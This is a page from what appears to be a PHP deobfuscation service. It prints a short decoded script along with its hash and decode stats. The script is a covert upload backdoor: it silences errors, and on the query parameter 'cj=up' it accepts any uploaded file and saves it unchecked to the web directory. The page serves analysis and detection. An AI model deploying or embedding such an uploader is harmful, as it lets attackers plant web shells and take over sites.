Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0); $system = $_GET['cj']; if($system == 'up'){ $temp = $_FILES[..
Decoded Output download
<?php
error_reporting(0);
$system = $_GET['cj'];
if($system == 'up'){
$temp = $_FILES['file']['tmp_name'];
$nan = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload' />
</form>";
move_uploaded_file($temp,$nan);
}
?>
Did this file decode correctly?
Original Code
<?php
error_reporting(0);
$system = $_GET['cj'];
if($system == 'up'){
$temp = $_FILES['file']['tmp_name'];
$nan = $_FILES['file']['name'];
echo "<form method='POST' enctype='multipart/form-data'>
<input type='file'name='file' />
<input type='submit' value='upload' />
</form>";
move_uploaded_file($temp,$nan);
}
?>
Function Calls
| error_reporting | 1 |
Stats
| MD5 | 64e271350f7a71944c6114cac6a89745 |
| Eval Count | 0 |
| Decode Time | 109 ms |